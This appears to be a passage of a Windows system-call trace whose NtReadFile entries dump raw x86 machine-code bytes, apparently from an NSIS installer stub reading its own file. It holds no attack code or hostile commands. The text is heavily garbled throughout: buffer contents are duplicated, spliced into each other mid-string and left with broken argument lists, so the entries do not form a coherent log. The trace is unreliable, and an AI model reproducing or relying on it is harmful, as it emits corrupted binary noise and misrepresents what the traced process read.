q@\09]\340\17\214\273\2\0\0PW\351\340\1\0\08\36\17\204\254\2\0\0V\350\3764\0\0P\377\25\34q@\0\351\232\2\0\08\37\17\204\331\360\377\377\215\205\\376\377\377PW\350\3354\0\0P\377\25\30q@\0\205\300\17\204\275\360\377\377\215\205\210\376\377\377PV\350J5\0\0\351d\2\0\0j\2\350\310\3\0\0\215\215\\376\377\377QP\377\25\24q@\0\203\370\377u\20\210\37\210\36\307E\374\1\0\0\0\351:\2\0\0PW\350r4\0\0\353\273S\307E\314f\375\377\377\350\217\3\0\0\213\360V\350p0\0\0\205\300Vt\15\276\310\255@\0V\350\3554\0\0\353!h\0TC\0h\310\255@\0\350\3344\0\0P\350\334/\0\0P", ) , ) == 0x0
 00745   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\350\47\0\0j\2h\0\0\0@V\350}1\0\0\203\370\377\211E\10\17\204\242\0\0\0\241,\360B\0P\211E\320\350\30.\0\0\213\370;\373\17\204\201\0\0\0S\350\225\11\0\0\377u\320W\350Z\11\0\0\377u\344\350\367-\0\0\213\360;\363\211u\324t4\377u\344VS\377u\340\350\20\7\0\0\353\30\213\16\213F\4\203\306\10Q\3\307VP\211M\310\350\3650\0\0\3u\3108\36u\344\377u\324\377\25\274p@\0\215E\274SP\377u\320W\377u\10\377\25Pq@\0W\377\25\274p@\0SS\377u\10j\377\350\304\6\0\0\211E\314\276\310\255@\0\377u\10\377\25lp@\09]\314j\363_}\21j\357_V\377\25\20q@\0\307E\374\1\0\0\0W\351\335\371\377\377S\350Q\2\0\0\213\360;5L\360B\0\17\203\257\376\377\377\213\15H\360B\0\215\4v\215\4\301\213M\344;\313\211E\10|\25\213\4\210PW\17\204\250\0\0\0\350\163\0\0\351\312\0\0\0\213=Hr@\0\203\310\377+\301\211E\344t\14j\1\350\1\2\0\0\211E\340\353\16\377u\340Vh\27\4\0\0\377u\314\377\327\213E\344\213M\10\213U\340\211\24\2019]\344\17\204\213\0\0\0SVh\30\4\0\0\377u\314\377\327\353}S\350\305\1\0\09]\350t\30\377\5\274\360B\0SSh2\4\0\0\377u\314\377\25Hr@\0\353Z\203\370 \17\203\13\376\377\3779]\344t\22\213\25(\360B\0\213M\340\211\214\202\224\0\0\0\353:\213\15(\360B\0\377\264\201\224\0\0\0W\350\243\0\0\353%\213\15\30\312B\0S#\310Qj\13\377u\370\377\25Hr@\09]\334t\13SS\377u\370\377\25Dr@\0\213E\374\1\5\250\360B\03\300_", ) , ) == 0x0
 00746   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "@\0Y!@\0t!@\0\226!@\0\317!@\0\351!@\0;"@\0i"@\0\207"@\0\3#@\0\367!@\0\15"@\0."@\0\24#@\0\250#@\0\15$@\0=$@\0P$@\0\21&@\0\24&@\0F&@\0[&@\0m&@\0\356&@\0\22'@\0I'@\0{'@\0\10(@\0)(@\0\315(@\0\315(@\0\217)@\0\254)@\0\307)@\0\343)@\0=*@\0\267*@\0\343*@\0K+@\0\362+@\0",@\0\260,@\0z-@\0\312.@\0N/@\0}/@\0\301/@\0\10@\0W0@\0\3650@\0g1@\0\3001@\0\3241@\0\3661@\0>2@\0\33@\043@\0N3@\0\2043@\0\2673@\0\3374@\0k5@\0\3505@\0\3505@\0\3035@\0\234'@\0\240'@\0\244'@\0\253'@\0\270'@\0\274'@\0\300'@\0\304'@\0\315'@\0\327'@\0\344'@\0\374'@\0\0(@\0\213D$\4\213\15\304\251@\0\3774\201j\0\350\2131\0\0P\350\3600\0\0\302\4\0V\213t$\10\205\366W\213\306}\2\367\330\213\25\304\251@\0\213\310\203\341\17\301\370\4\3774\212\301\340\12\5\310\251@\0P\350U1\0\0\205\366\213\370}\6W\350}3\0\0\213\307_^\302\4\0U\213\354\201\354\14\1\0\0SV\215E\374WP3\333j\10S\377u\14\377u\10\377\25\20p@\0;\303uM\2135 p@\0\277\5\1\0\0\353\319]\20uB\215\205\364\376\377\377SP\377u\374\350\271\377\377\377\205\300u\22\215\205\364\376\377\377WPS\377u\374\377\326\205\300t\325\377u\374\377", ) @\0i (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "@\0Y!@\0t!@\0\226!@\0\317!@\0\351!@\0;"@\0i"@\0\207"@\0\3#@\0\367!@\0\15"@\0."@\0\24#@\0\250#@\0\15$@\0=$@\0P$@\0\21&@\0\24&@\0F&@\0[&@\0m&@\0\356&@\0\22'@\0I'@\0{'@\0\10(@\0)(@\0\315(@\0\315(@\0\217)@\0\254)@\0\307)@\0\343)@\0=*@\0\267*@\0\343*@\0K+@\0\362+@\0",@\0\260,@\0z-@\0\312.@\0N/@\0}/@\0\301/@\0\10@\0W0@\0\3650@\0g1@\0\3001@\0\3241@\0\3661@\0>2@\0\33@\043@\0N3@\0\2043@\0\2673@\0\3374@\0k5@\0\3505@\0\3505@\0\3035@\0\234'@\0\240'@\0\244'@\0\253'@\0\270'@\0\274'@\0\300'@\0\304'@\0\315'@\0\327'@\0\344'@\0\374'@\0\0(@\0\213D$\4\213\15\304\251@\0\3774\201j\0\350\2131\0\0P\350\3600\0\0\302\4\0V\213t$\10\205\366W\213\306}\2\367\330\213\25\304\251@\0\213\310\203\341\17\301\370\4\3774\212\301\340\12\5\310\251@\0P\350U1\0\0\205\366\213\370}\6W\350}3\0\0\213\307_^\302\4\0U\213\354\201\354\14\1\0\0SV\215E\374WP3\333j\10S\377u\14\377u\10\377\25\20p@\0;\303uM\2135 p@\0\277\5\1\0\0\353\319]\20uB\215\205\364\376\377\377SP\377u\374\350\271\377\377\377\205\300u\22\215\205\364\376\377\377WPS\377u\374\377\326\205\300t\325\377u\374\377", ) @\0\3#@\0\367!@\0\15 (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "@\0Y!@\0t!@\0\226!@\0\317!@\0\351!@\0;"@\0i"@\0\207"@\0\3#@\0\367!@\0\15"@\0."@\0\24#@\0\250#@\0\15$@\0=$@\0P$@\0\21&@\0\24&@\0F&@\0[&@\0m&@\0\356&@\0\22'@\0I'@\0{'@\0\10(@\0)(@\0\315(@\0\315(@\0\217)@\0\254)@\0\307)@\0\343)@\0=*@\0\267*@\0\343*@\0K+@\0\362+@\0",@\0\260,@\0z-@\0\312.@\0N/@\0}/@\0\301/@\0\10@\0W0@\0\3650@\0g1@\0\3001@\0\3241@\0\3661@\0>2@\0\33@\043@\0N3@\0\2043@\0\2673@\0\3374@\0k5@\0\3505@\0\3505@\0\3035@\0\234'@\0\240'@\0\244'@\0\253'@\0\270'@\0\274'@\0\300'@\0\304'@\0\315'@\0\327'@\0\344'@\0\374'@\0\0(@\0\213D$\4\213\15\304\251@\0\3774\201j\0\350\2131\0\0P\350\3600\0\0\302\4\0V\213t$\10\205\366W\213\306}\2\367\330\213\25\304\251@\0\213\310\203\341\17\301\370\4\3774\212\301\340\12\5\310\251@\0P\350U1\0\0\205\366\213\370}\6W\350}3\0\0\213\307_^\302\4\0U\213\354\201\354\14\1\0\0SV\215E\374WP3\333j\10S\377u\14\377u\10\377\25\20p@\0;\303uM\2135 p@\0\277\5\1\0\0\353\319]\20uB\215\205\364\376\377\377SP\377u\374\350\271\377\377\377\205\300u\22\215\205\364\376\377\377WPS\377u\374\377\326\205\300t\325\377u\374\377", ) @\0\24#@\0\250#@\0\15$@\0=$@\0P$@\0\21&@\0\24&@\0F&@\0[&@\0m&@\0\356&@\0\22'@\0I'@\0{'@\0\10(@\0)(@\0\315(@\0\315(@\0\217)@\0\254)@\0\307)@\0\343)@\0=*@\0\267*@\0\343*@\0K+@\0\362+@\0 (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "@\0Y!@\0t!@\0\226!@\0\317!@\0\351!@\0;"@\0i"@\0\207"@\0\3#@\0\367!@\0\15"@\0."@\0\24#@\0\250#@\0\15$@\0=$@\0P$@\0\21&@\0\24&@\0F&@\0[&@\0m&@\0\356&@\0\22'@\0I'@\0{'@\0\10(@\0)(@\0\315(@\0\315(@\0\217)@\0\254)@\0\307)@\0\343)@\0=*@\0\267*@\0\343*@\0K+@\0\362+@\0",@\0\260,@\0z-@\0\312.@\0N/@\0}/@\0\301/@\0\10@\0W0@\0\3650@\0g1@\0\3001@\0\3241@\0\3661@\0>2@\0\33@\043@\0N3@\0\2043@\0\2673@\0\3374@\0k5@\0\3505@\0\3505@\0\3035@\0\234'@\0\240'@\0\244'@\0\253'@\0\270'@\0\274'@\0\300'@\0\304'@\0\315'@\0\327'@\0\344'@\0\374'@\0\0(@\0\213D$\4\213\15\304\251@\0\3774\201j\0\350\2131\0\0P\350\3600\0\0\302\4\0V\213t$\10\205\366W\213\306}\2\367\330\213\25\304\251@\0\213\310\203\341\17\301\370\4\3774\212\301\340\12\5\310\251@\0P\350U1\0\0\205\366\213\370}\6W\350}3\0\0\213\307_^\302\4\0U\213\354\201\354\14\1\0\0SV\215E\374WP3\333j\10S\377u\14\377u\10\377\25\20p@\0;\303uM\2135 p@\0\277\5\1\0\0\353\319]\20uB\215\205\364\376\377\377SP\377u\374\350\271\377\377\377\205\300u\22\215\205\364\376\377\377WPS\377u\374\377\326\205\300t\325\377u\374\377", ) , ) == 0x0
 00747   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\25\24p@\0_^[\311\302\14\0\377u\374\377\25\34p@\03\300@\353\353U\213\354\215E\10P\377u\10j\0j"\350&\377\377\377P\241\304\251@\0\377p\4\377\25\20p@\0\367\330\33\300\367\320#E\10]\302\4\0U\213\354\201}\14\20\1\0\0VW\213}\10\276\23\1\0\0u\33j\0h\372\0\0\0j\1W\377\25\10r@\0\213E\24\211u\14\243\320\305@\09u\14uN\213\15\330aA\0\241\340\241B\0;\310|\2\213\310PjdQ\377\25\14q@\0P\276\230aA\0\3775\320\305@\0V\377\25\34r@\0\203\304\14VW\377\25\14r@\0Vh\6\4\0\0W\350\34)\0\0j\5W\377\25\30r@\0_3\300^]\302\20\0U\213\354\203\354HSV3\366W\211u\374\377\25\250p@\0\211u\364\211u\370\276\0\C\0h\0\4\0\0V\213\370\3775 \360B\0\201\307\350\3\0\0\377\25\244p@\0j\3h\0\0\0\200V\350t,\0\0\213\330\203\373\377\211]\360\211\35H\220@\0u\12\270\240\221@\0\3517\2\0\0V\350\334*\0\0j\0S\377\25\240p@\0\205\300\243\340\241B\0\213\360\17\216U\1\0\0\241,\360B\0\213\336\367\330\33\300%\0~\0\0\5\0\2\0\0;\360|\2\213\330Sh\340!B\0\350&\4\0\0\205\300\17\204\7\1\0\03\3009\5,\360B\0u\177j\34\215E\324h\340!B\0P\350\324+\0\0\213M\324\367\301\360\377\377\377\17\205\222\0\0\0\201}\330\357\276\255\336\17\205\205\0\0\0\201}\344Instu|\201}\340softus\201}\334Nulluj\213E\354;\306\17\217,\1\0\0\11M\10\213\25\330aA\0\366E\10\10\211\25,\360B\0u\12\366E", ) \350&\377\377\377P\241\304\251@\0\377p\4\377\25\20p@\0\367\330\33\300\367\320#E\10]\302\4\0U\213\354\201}\14\20\1\0\0VW\213}\10\276\23\1\0\0u\33j\0h\372\0\0\0j\1W\377\25\10r@\0\213E\24\211u\14\243\320\305@\09u\14uN\213\15\330aA\0\241\340\241B\0;\310|\2\213\310PjdQ\377\25\14q@\0P\276\230aA\0\3775\320\305@\0V\377\25\34r@\0\203\304\14VW\377\25\14r@\0Vh\6\4\0\0W\350\34)\0\0j\5W\377\25\30r@\0_3\300^]\302\20\0U\213\354\203\354HSV3\366W\211u\374\377\25\250p@\0\211u\364\211u\370\276\0\C\0h\0\4\0\0V\213\370\3775 \360B\0\201\307\350\3\0\0\377\25\244p@\0j\3h\0\0\0\200V\350t,\0\0\213\330\203\373\377\211]\360\211\35H\220@\0u\12\270\240\221@\0\3517\2\0\0V\350\334*\0\0j\0S\377\25\240p@\0\205\300\243\340\241B\0\213\360\17\216U\1\0\0\241,\360B\0\213\336\367\330\33\300%\0~\0\0\5\0\2\0\0;\360|\2\213\330Sh\340!B\0\350&\4\0\0\205\300\17\204\7\1\0\03\3009\5,\360B\0u\177j\34\215E\324h\340!B\0P\350\324+\0\0\213M\324\367\301\360\377\377\377\17\205\222\0\0\0\201}\330\357\276\255\336\17\205\205\0\0\0\201}\344Instu|\201}\340softus\201}\334Nulluj\213E\354;\306\17\217,\1\0\0\11M\10\213\25\330aA\0\366E\10\10\211\25,\360B\0u\12\366E", ) == 0x0
 00748   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "p\374;\336v6\213\336\3532\366E\10\2u,9E\374u^\377\25\250p@\0;\307v\35h\204\221@\0hI8@\0j\0jo\3775 \360B\0\377\25\0r@\0\211E\374;5\340\241B\0}\21Sh\340!B\0\377u\364\350]\345\377\377\211E\364\1\35\330aA\0+\363\205\366\17\217\356\376\377\377\3532\215E\270P\377\25@r@\03\300j\1PPP\215E\270P\377\25dr@\0\205\300u\341\353\264\203}\374\0t{\377u\374\377\25\4r@\0\353p\203}\374\0t\11\377u\374\377\25\4r@\03\3779=,\360B\0tW9}\370t"\3775\330aA\0\350\17\3\0\0\215E\370j\4P\350\322\2\0\0\205\300t8\213E\364;E\370u0\377u\350\350c'\0\0\213\360\241,\360B\0\203\300\34P\350\340\2\0\0\377u\350VWj\377\350v\0\0\0;E\350t\16V\377\25\274p@\0\270P\220@\0\353\\366E\10\2\2115(\360B\0t\3\203\16\10\213\6\203\340\30\366E\324\1\243\300\360B\0\213\6\2430\360B\0t\6\377\54\360B\0j\10\215FDY\203\350\10\10Iu\370j\1WW\377u\360\377\25 q@\0\211F<\203\306\4j@Vh@\360B\0\350\5*\0\03\300_^[\311\302\4\0U\213\354\203\354XSV\213u\24W\213}\20\211u\370\205\377u\7\307E\370\0\200\0\0\203e\374\0\211}\364\205\377u\7\307E\364\340\241A\0\213E\10\205\300|\16\213\15x\360B\0\3\310Q\350\32\2\0\0\215E\24j\4P\350\335\1\0\0\205\300\17\204\200\1\0\0\366E\27\200\17\204_\1\0\0\213\35\250p@\0\377\323\203%\4\313@\0\0\203%\0\313@\0\0\201e\24\377\377\377\177\211E\360", ) \3775\330aA\0\350\17\3\0\0\215E\370j\4P\350\322\2\0\0\205\300t8\213E\364;E\370u0\377u\350\350c'\0\0\213\360\241,\360B\0\203\300\34P\350\340\2\0\0\377u\350VWj\377\350v\0\0\0;E\350t\16V\377\25\274p@\0\270P\220@\0\353\\366E\10\2\2115(\360B\0t\3\203\16\10\213\6\203\340\30\366E\324\1\243\300\360B\0\213\6\2430\360B\0t\6\377\54\360B\0j\10\215FDY\203\350\10\10Iu\370j\1WW\377u\360\377\25 q@\0\211F<\203\306\4j@Vh@\360B\0\350\5*\0\03\300_^[\311\302\4\0U\213\354\203\354XSV\213u\24W\213}\20\211u\370\205\377u\7\307E\370\0\200\0\0\203e\374\0\211}\364\205\377u\7\307E\364\340\241A\0\213E\10\205\300|\16\213\15x\360B\0\3\310Q\350\32\2\0\0\215E\24j\4P\350\335\1\0\0\205\300\17\204\200\1\0\0\366E\27\200\17\204_\1\0\0\213\35\250p@\0\377\323\203%\4\313@\0\0\203%\0\313@\0\0\201e\24\377\377\377\177\211E\360", ) == 0x0
 00749   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\0\0\0\243\220aA\0\243\214aA\0\213E\24\307\5\210aA\0\210aA\0\211E\10\17\216r\1\0\0\276\0@\0\09u\24}\3\213u\24\277\340aA\0VW\350c\1\0\0\205\300\17\204\6\1\0\0)u\24\211=\330\305@\0\2115\334\305@\0\213}\364\213E\370h\330\305@\0\211=\340\305@\0\243\344\305@\0\350\222\323\377\377\205\300\211E\350\17\214\262\0\0\0\2135\340\305@\0+\367\377\323\366\5\300\222@\0\1\213\370tC+E\360=\310\0\0\0w\6\203}\24\0u3\213E\10\377u\10+E\24jdP\377\25\14q@\0P\215E\250h\274\221@\0P\377\25\34r@\0\203\304\14\215E\250Pj\0\350\336\37\0\0\211}\3603\300;\360tI9E\20u P\215E\354PV\377u\364\377u\14\377\25Pq@\0\205\300t=9u\354u8\1u\374\353\30)u\370\1u\374\241\340\305@\0\203}\370\1\211E\364\17\214\201\0\0\0\203}\350\1\17\2055\377\377\377\353u9E\24\17\217\372\376\377\377\353jj\374\353\35j\376\353\31\205\377tS9u\24}\3\213u\24VW\350Y\0\0\0\205\300uHj\375X\353I\213u\3709u\24}\3\213u\24\277\340aA\0VW\3509\0\0\0\205\300t\340\215E\20j\0PVW\377u\14\377\25Pq@\0\205\300t\260;u\20u\253\1u\374)u\24\203}\24\0\177\277\353\3\211u\374\213E\374_^[\311\302\20\0U\213\354V\213u\14\215E\14j\0PV\377u\10\3775H\220@\0\377\250q@\0\205\300t\129u\14u\53\300@\353\23\300^]\302\10\0j\0j\0\377t$\14\3775H\220@\0\377\25 q@\0\302\4\0V\276\0dC\0V\350\25-\0\0", ) , ) == 0x0
 00750   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "V\350\311%\0\0j\0V\377\25\224p@\0Vh\0PC\0\350\244'\0\0^\303\203\354 SUV3\333W\211\$\30\307D$\20`\222@\0\306D$\24 \377\25(p@\0S\377\25|r@\0hT\222@\0h \350B\0\243\320\360B\0\350r*\0\0\276\0dC\0\277\0\4\0\0VW\377\25\304p@\0\350z\377\377\377\213-\214p@\0\205\300u!h\373\3\0\0V\377\25\300p@\0hL\222@\0V\377\325\350W\377\377\377\205\300\17\204G\1\0\0\276\0PC\0V\377\25\20q@\0W\377\25Tq@\0PV\377\25\270p@\0j\0\377\254q@\0\200=\0PC\0"\243 \360B\0u\12\306D$\24"\276\1PC\0\377t$\24V\350\35%\0\0P\377\25|q@\0\213\370\211|$\34\353c\200\371 u\6@\2008 t\372\2008"\306D$\24 u\6@\306D$\24"\2008/u3@\2008Su\16\212H\1\200\311 \200\371 u\3\203\313\2\2018NCRCu\16\212H\4\200\311 \200\371 u\3\203\313\4\201x\376 /D=t\30\377t$\24P\350\261$\0\0\2008"u\1@\212\10\204\311u\227\353\22\200`\376\0\203\300\2Ph\0TC\0\350_)\0\0S\350e\371\377\3773\333;\303\211D$\20uf9\354\360B\0tNSW\350r$\0\0\213\360\353\11\201> _?=t\5N;\367s\363;\367\307D$\20\240\221@\0rf\200&\0\203\306\4V\350\376$\0\0\205\300t*Vh\0TC\0\350\10)\0\0Vh\0XC\0\350\375(\0\0\211\$\20\203\15\314\360B\0\377\350\5\2\0\0\211D$\30\350\327\1\0\0\377\25\200r@\0\203|$\20\0\17\204\11\1", ) \243 \360B\0u\12\306D$\24 (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "V\350\311%\0\0j\0V\377\25\224p@\0Vh\0PC\0\350\244'\0\0^\303\203\354 SUV3\333W\211\$\30\307D$\20`\222@\0\306D$\24 \377\25(p@\0S\377\25|r@\0hT\222@\0h \350B\0\243\320\360B\0\350r*\0\0\276\0dC\0\277\0\4\0\0VW\377\25\304p@\0\350z\377\377\377\213-\214p@\0\205\300u!h\373\3\0\0V\377\25\300p@\0hL\222@\0V\377\325\350W\377\377\377\205\300\17\204G\1\0\0\276\0PC\0V\377\25\20q@\0W\377\25Tq@\0PV\377\25\270p@\0j\0\377\254q@\0\200=\0PC\0"\243 \360B\0u\12\306D$\24"\276\1PC\0\377t$\24V\350\35%\0\0P\377\25|q@\0\213\370\211|$\34\353c\200\371 u\6@\2008 t\372\2008"\306D$\24 u\6@\306D$\24"\2008/u3@\2008Su\16\212H\1\200\311 \200\371 u\3\203\313\2\2018NCRCu\16\212H\4\200\311 \200\371 u\3\203\313\4\201x\376 /D=t\30\377t$\24P\350\261$\0\0\2008"u\1@\212\10\204\311u\227\353\22\200`\376\0\203\300\2Ph\0TC\0\350_)\0\0S\350e\371\377\3773\333;\303\211D$\20uf9\354\360B\0tNSW\350r$\0\0\213\360\353\11\201> _?=t\5N;\367s\363;\367\307D$\20\240\221@\0rf\200&\0\203\306\4V\350\376$\0\0\205\300t*Vh\0TC\0\350\10)\0\0Vh\0XC\0\350\375(\0\0\211\$\20\203\15\314\360B\0\377\350\5\2\0\0\211D$\30\350\327\1\0\0\377\25\200r@\0\203|$\20\0\17\204\11\1", ) \306D$\24 u\6@\306D$\24 (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "V\350\311%\0\0j\0V\377\25\224p@\0Vh\0PC\0\350\244'\0\0^\303\203\354 SUV3\333W\211\$\30\307D$\20`\222@\0\306D$\24 \377\25(p@\0S\377\25|r@\0hT\222@\0h \350B\0\243\320\360B\0\350r*\0\0\276\0dC\0\277\0\4\0\0VW\377\25\304p@\0\350z\377\377\377\213-\214p@\0\205\300u!h\373\3\0\0V\377\25\300p@\0hL\222@\0V\377\325\350W\377\377\377\205\300\17\204G\1\0\0\276\0PC\0V\377\25\20q@\0W\377\25Tq@\0PV\377\25\270p@\0j\0\377\254q@\0\200=\0PC\0"\243 \360B\0u\12\306D$\24"\276\1PC\0\377t$\24V\350\35%\0\0P\377\25|q@\0\213\370\211|$\34\353c\200\371 u\6@\2008 t\372\2008"\306D$\24 u\6@\306D$\24"\2008/u3@\2008Su\16\212H\1\200\311 \200\371 u\3\203\313\2\2018NCRCu\16\212H\4\200\311 \200\371 u\3\203\313\4\201x\376 /D=t\30\377t$\24P\350\261$\0\0\2008"u\1@\212\10\204\311u\227\353\22\200`\376\0\203\300\2Ph\0TC\0\350_)\0\0S\350e\371\377\3773\333;\303\211D$\20uf9\354\360B\0tNSW\350r$\0\0\213\360\353\11\201> _?=t\5N;\367s\363;\367\307D$\20\240\221@\0rf\200&\0\203\306\4V\350\376$\0\0\205\300t*Vh\0TC\0\350\10)\0\0Vh\0XC\0\350\375(\0\0\211\$\20\203\15\314\360B\0\377\350\5\2\0\0\211D$\30\350\327\1\0\0\377\25\200r@\0\203|$\20\0\17\204\11\1", ) u\1@\212\10\204\311u\227\353\22\200`\376\0\203\300\2Ph\0TC\0\350_)\0\0S\350e\371\377\3773\333;\303\211D$\20uf9\354\360B\0tNSW\350r$\0\0\213\360\353\11\201> _?=t\5N;\367s\363;\367\307D$\20\240\221@\0rf\200&\0\203\306\4V\350\376$\0\0\205\300t*Vh\0TC\0\350\10)\0\0Vh\0XC\0\350\375(\0\0\211\$\20\203\15\314\360B\0\377\350\5\2\0\0\211D$\30\350\327\1\0\0\377\25\200r@\0\203|$\20\0\17\204\11\1", ) == 0x0
 00751   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\376!\0\0j\2\377\25\264p@\0\211\$\24\277\351\245B\0\276\350\245B\0\273\350\241B\0h\0dC\0W\306\5\350\245B\0"\350\230(\0\0h\310\221@\0V\377\325W\377\25\20q@\0\203|$\20\0\17\204\232\0\0\0h\0\4\0\0S\3775 \360B\0\377\25\244p@\0\215\200\335\241B\0h\311\221@\0P\377\25hp@\0\205\300\17\204i\377\377\377j\0WS\377\25\260p@\0\205\300t`j\0W\350y%\0\0\200=\0TC\0\0t\15h\0TC\0S\350((\0\0\353\6S\350n#\0\0hH\222@\0V\377\325\377t$\34V\377\325h@\222@\0V\377\325SV\377\325V\350\5#\0\0h\0dC\0V\350\265 \0\0\205\300t\14P\377\25lp@\0\203d$\20\0\376\5\310\221@\0\377D$\24\203|$\24\32\17\214%\377\377\377\351\341\376\377\377\203=\264\360B\0\0\17\204\230\0\0\0h0\222@\0\377\254q@\0\213\370\205\377tr\2135350\230(\0\0h\310\221@\0V\377\325W\377\25\20q@\0\203|$\20\0\17\204\232\0\0\0h\0\4\0\0S\3775 \360B\0\377\25\244p@\0\215\200\335\241B\0h\311\221@\0P\377\25hp@\0\205\300\17\204i\377\377\377j\0WS\377\25\260p@\0\205\300t`j\0W\350y%\0\0\200=\0TC\0\0t\15h\0TC\0S\350((\0\0\353\6S\350n#\0\0hH\222@\0V\377\325\377t$\34V\377\325h@\222@\0V\377\325SV\377\325V\350\5#\0\0h\0dC\0V\350\265 \0\0\205\300t\14P\377\25lp@\0\203d$\20\0\376\5\310\221@\0\377D$\24\203|$\24\32\17\214%\377\377\377\351\341\376\377\377\203=\264\360B\0\0\17\204\230\0\0\0h0\222@\0\377\254q@\0\213\370\205\377tr\213534\222@\0W\377\326h\4\222@\0W\213\350\377\326h\354\221@\0W\213\330\377\326\205\355\213\370tJ\205\333tF\205\377tB\215D$\34Pj(\377\25\254p@\0P\377\325\205\300t.\215D$$3\366Ph\330\221@\0V\377\323VV\215D$(VPV\377t$0\307D$8\1\0\0\0\307D$D\2\0\0\0\377\327j\0j\2\377\25xq@\0\205\300u\7j\11\350\34\337\377\377\241\314\360B\0\203\370\377t\4\211D$\30\377t$\30\377\25\264p@\0\241H\220@\0\203\370\377t\16P\377\25lp@\0\203\15H\220@\0\377j\7h\0hC\0\350s \0\0\303\2410\360B\0\203\354\24\203\340 SUV\2135(\360B", ) == 0x0
 00752   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\275\0TC\0U\350\245"\0\03\333\205\300\17\205\200\0\0\0\213NH;\313ty\213VL\241X\360B\0\277\300\337B\0\3\320W\3\310RQ\377vD\350\205%\0\0\240\300\337B\0:\303tT<"u\17\277\301\337B\0j"W\350\251!\0\0\210\30W\350u&\0\0\215D8\374;\307v&h\340\222@\0P\377\25hp@\0\205\300u\26W\377\25tp@\0\203\370\377t\4\250\20u\6W\350\217!\0\0W\350A!\0\0PU\3504&\0\0U\350\25"\0\0\205\300u\14\377\266\30\1\0\0U\350*&\0\0h@\200\0\0SSj\1jg\3775 \360B\0\377\254r@\0\243\10\350B\0\203~P\377\277\300\347B\0\17\204\211\0\0\0\213\15 \360B\0\243\324\347B\0\215D$\20W\307D$\24_Nb\0\307\5\304\347B\02\36@\0\211\15\320\347B\0\243\344\347B\0\377\25\220q@\0f\205\300\17\204$\1\0\0\215D$\24SPSj0\377\25\214q@\0S\3775 \360B\0\213D$(+D$ SSP\213D$0+D$(P\215D$(\377t$0\377t$0h\0\0\0\200SPh\200\0\0\0\377\25\210q@\0\243\370\265B\0S\350[\335\377\377\205\300t\10j\2X\351\307\0\0\0\350\312\0\0\09\35\300\360B\0\17\205\213\0\0\0j\5\3775\370\265B\0\377\25\30r@\0\21358q@\0\275\320\222@\0U\377\326\205\300u\14Uf\307\5\326\222@\032\377\326\213-\204q@\0\276\304\222@\0WVS\377\325\205\300u\37WVS\210\35\314\222@\0\377\325W\2115\344\347B\0\306\5\314\222@\02\377\25\220q@\0\241\0\350B\0S\203\300ih\373D@\0\17\267\300SP", ) \0\03\333\205\300\17\205\200\0\0\0\213NH;\313ty\213VL\241X\360B\0\277\300\337B\0\3\320W\3\310RQ\377vD\350\205%\0\0\240\300\337B\0:\303tT< (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\275\0TC\0U\350\245"\0\03\333\205\300\17\205\200\0\0\0\213NH;\313ty\213VL\241X\360B\0\277\300\337B\0\3\320W\3\310RQ\377vD\350\205%\0\0\240\300\337B\0:\303tT<"u\17\277\301\337B\0j"W\350\251!\0\0\210\30W\350u&\0\0\215D8\374;\307v&h\340\222@\0P\377\25hp@\0\205\300u\26W\377\25tp@\0\203\370\377t\4\250\20u\6W\350\217!\0\0W\350A!\0\0PU\3504&\0\0U\350\25"\0\0\205\300u\14\377\266\30\1\0\0U\350*&\0\0h@\200\0\0SSj\1jg\3775 \360B\0\377\254r@\0\243\10\350B\0\203~P\377\277\300\347B\0\17\204\211\0\0\0\213\15 \360B\0\243\324\347B\0\215D$\20W\307D$\24_Nb\0\307\5\304\347B\02\36@\0\211\15\320\347B\0\243\344\347B\0\377\25\220q@\0f\205\300\17\204$\1\0\0\215D$\24SPSj0\377\25\214q@\0S\3775 \360B\0\213D$(+D$ SSP\213D$0+D$(P\215D$(\377t$0\377t$0h\0\0\0\200SPh\200\0\0\0\377\25\210q@\0\243\370\265B\0S\350[\335\377\377\205\300t\10j\2X\351\307\0\0\0\350\312\0\0\09\35\300\360B\0\17\205\213\0\0\0j\5\3775\370\265B\0\377\25\30r@\0\21358q@\0\275\320\222@\0U\377\326\205\300u\14Uf\307\5\326\222@\032\377\326\213-\204q@\0\276\304\222@\0WVS\377\325\205\300u\37WVS\210\35\314\222@\0\377\325W\2115\344\347B\0\306\5\314\222@\02\377\25\220q@\0\241\0\350B\0S\203\300ih\373D@\0\17\267\300SP", ) W\350\251!\0\0\210\30W\350u&\0\0\215D8\374;\307v&h\340\222@\0P\377\25hp@\0\205\300u\26W\377\25tp@\0\203\370\377t\4\250\20u\6W\350\217!\0\0W\350A!\0\0PU\3504&\0\0U\350\25 (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, 